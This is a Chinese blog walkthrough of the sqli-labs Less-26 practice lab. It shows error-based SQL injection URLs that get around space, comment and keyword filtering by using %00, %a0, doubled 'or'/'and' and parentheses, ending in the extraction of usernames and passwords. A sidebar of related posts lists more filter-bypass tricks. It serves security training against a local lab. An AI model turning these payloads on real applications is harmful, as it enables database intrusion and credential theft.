sqli-labs-less-26 %a0绕过空格,报错注入

最新推荐文章于 2024-04-30 04:08:20 发布
最新推荐文章于 2024-04-30 04:08:20 发布
阅读量1k 收藏 3
点赞数 2
分类专栏: sql注入 文章标签: sql web 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46432288/article/details/110558669
版权

Less-26

该关卡提示空格和注释被转义,我们测试一下:
http://127.0.0.1/sqli-labs-master/Less-26/?id=1 正常显示,有回显
http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ 报错
http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ --+ 依旧报错,并且提示提示信息为:
在这里插入图片描述

我们添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下:

http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ ;%00 正常显示
在这里插入图片描述

除了用;%00绕过,我们还可以使用id=1’ or ‘1’=’1进行绕过,但是要注意该关卡的or和空格都进行了转义,空格可以使用编码%0A代替,但是在Windows phpstudy环境下,空白字符编码无效,所以我们无法使用空格。

由于无法使用空格,因此http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ (oorrder by 4);%00这种语句都无法使用,我们使用报错注入:

方法一:

获取当前数据库:

http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ union (select(extractvalue(1,concat(0x7e,database()))));%00
在这里插入图片描述

获取所有数据库:

但是这里长度有限制,无法全部取出
http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ || (select (extractvalue(1,concat(0x7e,(select (group_concat(schema_name)) from (infoorrmation_schema.schemata) )))));%00
在这里插入图片描述

获取security库中的表:

http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ || (select (extractvalue(1,concat(0x7e,(select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema=0x7365637572697479))))));%00
在这里插入图片描述

获取users库中字段:

注意and也需要双写:

http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ || (select (extractvalue(1,concat(0x7e,(select (group_concat(column_name)) from (infoorrmation_schema.columns) where ((table_schema=0x7365637572697479) aandnd (table_name=0x7573657273)))))));%00
在这里插入图片描述

获取username和password字段的信息:

注意password中or需要双写,由于长度限制,使用group_concat()函数无法取出全部数据,而且空格被转义,所有limit函数也无法使用,因此我们使用where(id=1)来定位数据,这样可以取出全部数据。

http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ || (select (extractvalue(1,concat(0x7e,(select (concat(username,0x7e,passwoorrd)) from (security.users) where (id=1))))));%00
在这里插入图片描述

方法二:

在docker中,空格可以用转义符%a0代替。

获取字段数:

在这里插入图片描述

获取回显字段:

在这里插入图片描述

获取当前数据库:

在这里插入图片描述

获取表名,字段名、数据方法类似,用%a0代替空格即可。

yzcn
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
SQL注入分析-less-26
qq_33505576的博客
02-15 1244
SQL注入分析-less-26 近期在学习SQL注入的知识,在此呢,写篇博客记录一下手工注入的过程,中间走的弯路呢就不多提了,主要把自己成功注入的过程和结果在此做一个记录,不喜勿喷哈! 1、按照提示,在地址栏输入参数 http://192.168.88.129/sqli-labs-master/Less-26/?id=1 结果如下,正常回显: 使用单引号看看页面会报什么信息: http://192.168.88.129/sqli-labs-master/Less-26/?id=1’ 从这里判断
sql注入 Less-26-31
lyy0xfff的博客
07-23 367
ContentsPreface本博文仅用于信息安全防御教学,请遵守中华人民共和国网络安全法!!Less-26Less-26aLess-27Less-27aLess-28Less-28aLess-29Less-30 Preface 本博文仅用于信息安全防御教学,请遵守中华人民共和国网络安全法!! Less-26 0x00 由题干我们知道,它对我们的空格和一些内容进行了过滤,经过我尝试,我发现,它过滤了我们的 and 、or 、 # 、– 因为空格无法进行双写,所以我们必须要想办法绕过空格过滤 首先我们根据题目
黑客常用SQL注入绕过技术总结!(冰河吐血整理,建议收藏)
最新发布
2401_84253037的博客
04-30 755
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。在使用盲注的时候,需要使用到substr(),mid(),limit。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。
SQL注入分析-less-26a
qq_33505576的博客
02-16 351
SQL注入分析-less-26a 1、还是按照提示,在地址栏输入参数。 http://192.168.88.129/sqli-labs-master/Less-26a/?id=1 正常回显,结果如下: 2、SQL注入的一般做法,还是输入单引号试试。 http://192.168.88.129/sqli-labs-master/Less-26a/?id=1%27 这里没有返回结果,也没有报错信息,有两种可能性,一种可能性是查询条件错误;另一种可能性是单引号导致SQL语句没有正常闭合,因为这关利用的
sqli-less-26-less26a
沐目的博客
04-18 1027
less-26 单引号 GET型 这关就有点过滤的意思了,过滤了上一关的东西,并且把空格和%23给过滤了。如果是ubuntu的话,可以用/**/,%0a等绕过,方便一些。但我的是windows,所以就只能用()了。让后使用||来代替and,用‘1来闭合。 数据库: -1’ || updatexml(1,concat(0x7e,(database()),0x7e),1)||'1 表: 1’|...
关于phpStudy的Less-26空格被过滤使用%a0变乱码无法执行应该带有空格的查询语句
m0_47505062的博客
02-23 914
我的实验环境是: C:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-26 联系sql inject 注入联系第26关, 输入的空格被过滤了 提示中明显指出select 和 1之间的空格被过滤了, 包括使用 %a0 也不行 http://127.0.0.1/sqli-labs-master/Less-26/?id=0' || (select%a01) || ' 老师使用 %a0 成功了,但是我使用 %a0 报错 Invalid utf8 chara
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli...
SQL注入的绕过
weixin_33858336的博客
12-23 643
一、常用符号的绕过   1、空格 1 空格代替:+ %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 2 括号绕过:常用于基于时间延迟的盲注,例如构造语句: ?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23   2、“ = ”号 使用like 、rlike 、reg...
Sqli-labs less 26
weixin_34388207的博客
08-11 206
Less-26 TIPS:本关可能有的朋友在windows下无法使用一些特殊的字符代替空格,此处是因为apache的解析的问题,这里请更换到linux平台下。 本关结合25关,将空格,or,and,/*,#,--,/等各种符号过滤,此处对于and,or的处理方法不再赘述,参考25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ' ;对于空格,有较多的...
sqli-labs通关全解---有关过滤的绕过--less23,25~28,32~37--8
cyynid的博客
01-12 893
preg_replace()用于sql注入防护中,主要是将一些疑似攻击的代码进行替换处理,从而使得他无法达到攻击的目的,例如将‘/’替换成空格,将union替换成空格等,但是由于攻击方式的多样化和程序员的疏忽,往往无法过滤掉所有的攻击,甚至可以对此类过滤进行绕过处理。返回在预定义字符之前添加反斜杠的字符串。即将预定义的字符进行转义提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。本文列举了一些对此类过滤方法的绕过手段,同样,也可以针对绕过手段,进行更加安全的过滤。
sql注入绕过技巧
m_ing
10-21 1879
前言 今天斗胆来整理一下sql注入的各种绕过姿势,以后方便查阅。SQL注入的绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。 1.括号绕过空格 如果空格被过滤,括号没有被过滤,可以用括号绕过。 在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。 例如: select(user())from dual where
常见绕过方法总结
weixin_66839513的博客
03-26 1285
两个空格代替一个空格,用Tab代替空格,%a0=空格绕过的替代类型:%20 --代表url编码的空格,在空格过滤时可以代替。%09--用于在输出或显示文本时在该位置产生一个固定的水平间距,类似于tab键。%0a--代表换行符%0b--用于在输出或显示文本时在该位置产生一个固定的垂直间距,类似于tab键。%0c--%0d--回车换行%a0--代表的是非断行空格%00--%00代表的是ASCII码中的空字符/**/可以将空格字符替换成注释/**/,也可以使用内联注释,/!code。
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
“0d 0a”这两个字符是什么涵义
热门推荐
liuyukuan的专栏
11-22 6万+
其实这是从打字机的概念来的: 0x0d => \r, carrige return, 指打字头归位的动作 0x0a => \n, new line, 指打字机上卷一行的动作 Windows 在行尾使用 CRLF (carriage return/line feed, 0d 0a) UNIX 好像只使用 LF(0a) 0d------回车符号------"\r" 0a------换...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值